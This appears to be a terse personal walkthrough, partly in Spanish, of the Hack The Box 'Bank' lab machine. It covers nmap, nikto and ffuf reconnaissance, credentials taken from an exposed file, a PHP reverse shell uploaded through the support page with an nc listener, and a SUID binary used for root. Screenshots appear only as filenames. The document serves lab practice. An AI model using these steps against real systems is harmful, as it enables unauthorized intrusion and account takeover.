nmap -A -p- -oA bank 10.129.121.9 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA bank 10.129.121.9

nmap -sU -O -p- -oA bank-udp 10.129.121.9

nikto -h 10.129.121.9:80

Pasted image 20220330094413.png

Pasted image 20220330094948.png

whatweb http://10.129.121.9

Pasted image 20220330092948.png

echo "10.129.121.9 bank.htb" | sudo tee -a /etc/hosts

Pasted image 20220330093328.png

ffus -u "http://bank.htb/FUZZ" -w /usr/share/seclists/Discover/Web-Content/directory-list-2.3-medium.txt

Pasted image 20220330094323.png

http://10.129.121.9/balance-transfer

Pasted image 20220330095713.png

Nos dirigimos a http://10.129.121.9 pero no tenemos credenciales

Pasted image 20220330095538.png

Le hacemos un cat al archivo y vemos credenciales-> chris@bank.htb:!##HTBB4nkP4ssw0rd!##

Pasted image 20220330095847.png

Nos logeamos

Pasted image 20220330100353.png

cp /usr/share/webshells/php/php-reverse-shell.php shell.htb

Modificamos el archivo con la ip de la maquina kali y el puerto 443

nc -lvnp 443

http://bank.htb/support.php

Subimos el archivo shell.htb

Le damos click a Click Here en attachments

Pasted image 20220330103825.png

cd /tmp

find / -perm -u=s 2>/dev/null

file /var/htb/bin/emergency

ls -al /var/htb/bin/emergency

/var/htb/bin/emergency

Pasted image 20220330104354.png

boxes

copyright©2022 Cu3rv0x all rights reserved